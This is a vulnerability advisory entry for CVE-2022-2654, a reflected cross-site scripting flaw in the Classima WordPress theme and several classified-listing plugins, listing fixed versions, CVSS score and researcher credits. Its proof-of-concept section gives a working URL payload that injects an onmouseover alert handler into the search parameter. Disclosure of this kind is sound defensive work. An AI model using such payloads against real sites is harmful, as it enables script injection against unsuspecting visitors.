WordPress Plugin Vulnerabilities

Classima < 2.1.11 - Reflected Cross-Site Scripting

Description

The theme and some of its required plugins do not escape a parameter before outputting it back in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/all-ads/?q="+onmouseover%3Dalert%281%29+id%3Dx+tabindex%3D0+style%3Ddisplay%3Ablock

The XSS will be triggered when the user will move the mouse over the Search field

Affects Plugins

Plugin icon
classified-listing
Fixed in 2.2.14
Plugin icon
classified-listing-pro
Fixed in 2.0.20
Plugin icon
classified-listing-store
Fixed in 1.4.20
Plugin icon
classima-core
Fixed in 1.10

Affects Themes

classima
Fixed in 2.1.11

References

CVE
CVE-2022-2654

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Team ISH Tecnologia (Thiago Martins, Jorge Buzeti, Leandro Inacio, Lucas de Souza, Matheus Oliveira, Filipe Baptistella, Leonardo Paiva, Jose Thomaz, Joao Maciel, Vinicius Pereira, Geovanni Campos, Hudson Nowak, Guilherme Acerbi) and Islan Ferreira.
Submitter
Geovanni Campos
Verified
Yes
WPVDB ID
845f44ca-f572-48d7-a19a-89cace0b8993

Timeline

Publicly Published
2022-08-22 (about 1 years ago)
Added
2022-08-22 (about 1 years ago)
Last Updated
2023-05-13 (about 1 years ago)

Other

Published
Title
Published
2023-10-11
Title
EventPrime < 3.1.6 - Reflected XSS
Published
2018-05-28
Title
Email Subscribers & Newsletters < 3.5.0 - Cross-Site Scripting (XSS)
Published
2024-03-25
Title
SEO Backlink Monitor < 1.6.0 - Reflected Cross-Site Scripting
Published
2014-08-01
Title
Simple Flash Video 1.7 - Cross Site Scripting
Published
2021-10-25
Title
Ninja Tables < 4.1.8 - Admin+ Stored Cross-Site Cross-Site Scripting